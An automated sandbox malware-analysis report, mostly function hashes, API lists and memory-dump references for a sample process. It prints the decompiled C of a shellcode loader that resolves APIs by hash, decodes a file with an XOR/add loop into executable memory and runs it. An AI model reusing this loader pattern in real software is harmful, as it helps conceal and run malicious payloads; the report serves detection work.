                                                • Opcode ID: 90775d64aebd1788a42b5ce1aed19ba2953fb7cbe4a791c08afb410f4f526fbb
                                                • Instruction ID: a40dfbc337ac82f363e6fc070a3dbeef329c77a53c0c0a1e283b16a75e0f5ccd
                                                • Opcode Fuzzy Hash: 90775d64aebd1788a42b5ce1aed19ba2953fb7cbe4a791c08afb410f4f526fbb
                                                • Instruction Fuzzy Hash: 76D10A31D44388E9EF21DBE4DC0ABADBBB5BF44700F14409AE648BA1D1D7B50A84DB5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005006F1, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 005007F3
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 005009C0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2096240274.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: 1a130295db4accc40e27706ea50130c96f412ff03570a98c8799038c82ee0c03
                                                • Instruction ID: 111e8c2470d895c0ef8b6d4aaf598bf83e8e126d16f87ba71bca08760760157c
                                                • Opcode Fuzzy Hash: 1a130295db4accc40e27706ea50130c96f412ff03570a98c8799038c82ee0c03
                                                • Instruction Fuzzy Hash: 3BA1FE30D04209EFEF10DFE4C889BADBBB1BF48711F20986AE511BA2E1D7759A40DB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00500034, Relevance: 5.0, APIs: 3, Instructions: 546processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000), ref: 0050035F
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005003A6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2096240274.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                Similarity
                                                • API ID: Process$CreateMemoryRead
                                                • String ID:
                                                • API String ID: 2726527582-0
                                                • Opcode ID: 39fa4b16257d238a65f1c405eb7f5a880e7452aefc4b068a35c121de0971fe34
                                                • Instruction ID: d687069a8f207850019d2d04580d9e06aed6d5d5a06606f10557eedb1354b4ce
                                                • Opcode Fuzzy Hash: 39fa4b16257d238a65f1c405eb7f5a880e7452aefc4b068a35c121de0971fe34
                                                • Instruction Fuzzy Hash: 10220431D40219AEEF20DBA4DC45BEDBBB5BF48700F20549AE608EA2E1D7719A90DF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001120, Relevance: 4.6, APIs: 3, Instructions: 140filememoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 62%
                                                			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t137;

				_v8 =  *0x10003024 ^ _t137;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 = _v529 & 0x000000ff ^ 0x0000008f;
					_v529 = (_v529 & 0x000000ff) + 0x25;
					_v529 = _v529 & 0x000000ff ^ 0x000000f4;
					_v529 = (_v529 & 0x000000ff) - 0xfc;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 = (_v529 & 0x000000ff) + 0xa2;
					_v529 = _v529 & 0x000000ff ^ 0x00000060;
					_v529 = (_v529 & 0x000000ff) + 0x8d;
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = _v529 & 0x000000ff ^ _v536;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E10001439(_v8 ^ _t137);
			}



















                                                0x10001130
                                                0x10001133
                                                0x1000113d
                                                0x1000114c
                                                0x10001166
                                                0x10001180
                                                0x1000119a
                                                0x100011b4
                                                0x100011ce
                                                0x100011e8
                                                0x100011fa
                                                0x1000120c
                                                0x10001231
                                                0x10001246
                                                0x10001262
                                                0x10001286
                                                0x1000128c
                                                0x100012a7
                                                0x100012c7
                                                0x100012da
                                                0x100012ea
                                                0x100012fc
                                                0x1000130f
                                                0x10001322
                                                0x10001334
                                                0x10001344
                                                0x10001357
                                                0x10001366
                                                0x10001375
                                                0x10001388
                                                0x100013a0
                                                0x100012a1
                                                0x100012a1
                                                0x100013a7
                                                0x100013ba

                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2097444695.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000006.00000002.2097439112.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000006.00000002.2097449654.0000000010002000.00000002.00020000.sdmp Download File
                                                • Associated: 00000006.00000002.2097455473.0000000010004000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AllocCreateReadVirtual
                                                • String ID:
                                                • API String ID: 3585551309-0
                                                • Opcode ID: 0f3914bf42787196db8c33df15e459a24dbd7e722ee53aeb977411386a0334da
                                                • Instruction ID: 1609647f9a208fd04caaa7c864deaa65b2fef1ef99b7b7fbad4ae3efe2210774
                                                • Opcode Fuzzy Hash: 0f3914bf42787196db8c33df15e459a24dbd7e722ee53aeb977411386a0334da
                                                • Instruction Fuzzy Hash: 52614074C462BC9BDB20CBA49C99BEDBBB4AF5A201F0481C9E55C66286C6345FC0CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 005017F3, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2096240274.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                • Instruction ID: 34954b2985f55ee0eecfd0eadb7673bfa0e48a8ea74741c3f00545c308d9dc50
                                                • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                • Instruction Fuzzy Hash: 09013A78A10608EFCB90DF99C58499DBBF4FF08320B108596E814E7711D330AE509B45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001000, Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                0x10001017

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2097444695.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000006.00000002.2097439112.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000006.00000002.2097449654.0000000010002000.00000002.00020000.sdmp Download File
                                                • Associated: 00000006.00000002.2097455473.0000000010004000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005015DB, Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2096240274.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: MSID8B1.tmp PID: 2472 Parent PID: 3012 MSID8B1.tmpCOMMON

                                                Executed Functions

                                                Function 008F00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008F0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008F0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
